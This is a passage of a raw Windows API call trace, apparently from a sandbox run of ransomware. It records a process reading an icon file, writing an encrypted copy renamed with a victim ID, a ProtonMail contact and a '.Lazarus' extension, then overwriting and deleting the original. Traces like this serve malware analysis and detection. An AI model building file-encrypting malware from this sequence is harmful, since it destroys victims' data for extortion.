HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0074.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0074.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0074.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0074.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0074.573] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.573] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.573] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x1, dwReserved1=0x0, cFileName="Rotate2.ico", cAlternateFileName="")) returned 1 [0074.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0074.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0074.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0074.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0074.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0074.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0074.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0074.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0074.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0074.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0074.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0074.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0074.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0074.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0074.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0074.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0074.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0074.573] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.573] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.573] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.573] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0074.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.574] AreFileApisANSI () returned 1 [0074.574] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico", lpUsedDefaultChar=0x0) returned 43 [0074.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0074.574] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.574] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0074.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0074.574] AreFileApisANSI () returned 1 [0074.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0074.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67900 [0074.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x67900, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 43 [0074.574] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate2.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0074.574] GetFileType (hFile=0x410) returned 0x1 [0074.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67900 | out: hHeap=0x20000) returned 1 [0074.574] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0074.574] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0074.575] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0074.575] CloseHandle (hObject=0x410) returned 1 [0074.575] AreFileApisANSI () returned 1 [0074.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0074.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67540 [0074.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 43 [0074.575] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate2.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0074.575] GetFileType (hFile=0x410) returned 0x1 [0074.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0074.575] CloseHandle (hObject=0x410) returned 1 [0074.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0074.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0074.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0074.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0074.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0074.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0074.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0074.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0074.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0074.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0074.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0074.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0074.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0074.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0074.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0074.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0074.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0074.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0074.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0074.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0074.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0074.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0074.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0074.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0074.576] AreFileApisANSI () returned 1 [0074.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0074.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67540 [0074.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 43 [0074.577] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate2.ico"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e)) returned 1 [0074.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0074.577] AreFileApisANSI () returned 1 [0074.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0074.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0074.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0074.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0074.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0074.577] GetLastError () returned 0x0 [0074.577] SetLastError (dwErrCode=0x0) [0074.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e378 [0074.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0074.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b450 [0074.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0074.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6a8 [0074.577] GetLastError () returned 0x0 [0074.577] SetLastError (dwErrCode=0x0) [0074.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0074.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0074.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x68f40 [0074.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0074.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75e40 [0074.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0074.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0074.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0074.578] AreFileApisANSI () returned 1 [0074.578] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75e40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0074.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x5a6b8 [0074.578] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75e40, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=105 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 105 [0074.578] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate2.ico.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0074.578] GetFileType (hFile=0x410) returned 0x1 [0074.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0074.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0074.578] AreFileApisANSI () returned 1 [0074.578] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0074.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67540 [0074.578] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 43 [0074.579] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate2.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.579] GetFileType (hFile=0x42c) returned 0x1 [0074.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0074.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a430 [0074.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0074.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0074.579] GetLastError () returned 0x0 [0074.579] SetLastError (dwErrCode=0x0) [0074.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0074.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0074.579] GetLastError () returned 0x0 [0074.579] SetLastError (dwErrCode=0x0) [0074.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0074.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0074.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0074.579] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f030*=0x37e, lpOverlapped=0x0) returned 1 [0074.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0074.772] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0074.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d540 [0074.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x91458 [0074.773] GetLastError () returned 0x0 [0074.773] SetLastError (dwErrCode=0x0) [0074.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe) returned 0x7d738 [0074.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d690 [0074.774] GetLastError () returned 0x0 [0074.774] SetLastError (dwErrCode=0x0) [0074.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d540 | out: hHeap=0x20000) returned 1 [0074.774] WriteFile (in: hFile=0x410, lpBuffer=0x91458*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x91458*, lpNumberOfBytesWritten=0x327ef70*=0x380, lpOverlapped=0x0) returned 1 [0074.775] GetLastError () returned 0x0 [0074.775] SetLastError (dwErrCode=0x0) [0074.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d738 | out: hHeap=0x20000) returned 1 [0074.775] GetLastError () returned 0x0 [0074.775] SetLastError (dwErrCode=0x0) [0074.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0074.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0074.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d690 | out: hHeap=0x20000) returned 1 [0074.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0074.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0074.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x91458 | out: hHeap=0x20000) returned 1 [0074.776] CloseHandle (hObject=0x410) returned 1 [0074.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0074.777] CloseHandle (hObject=0x42c) returned 1 [0074.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0074.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0074.777] AreFileApisANSI () returned 1 [0074.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0074.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67900 [0074.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x67900, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 43 [0074.778] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate2.ico"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.778] GetFileType (hFile=0x42c) returned 0x1 [0074.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67900 | out: hHeap=0x20000) returned 1 [0074.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0074.779] GetLastError () returned 0xb7 [0074.779] SetLastError (dwErrCode=0xb7) [0074.779] WriteFile (in: hFile=0x42c, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0074.780] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0074.780] CloseHandle (hObject=0x42c) returned 1 [0074.780] AreFileApisANSI () returned 1 [0074.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0074.780] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67540 [0074.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 43 [0074.780] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate2.ico")) returned 1 [0074.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0074.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0074.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0074.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0074.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0074.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0074.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0074.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0074.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6a8 | out: hHeap=0x20000) returned 1 [0074.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0074.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0074.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b450 | out: hHeap=0x20000) returned 1 [0074.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0074.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0074.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 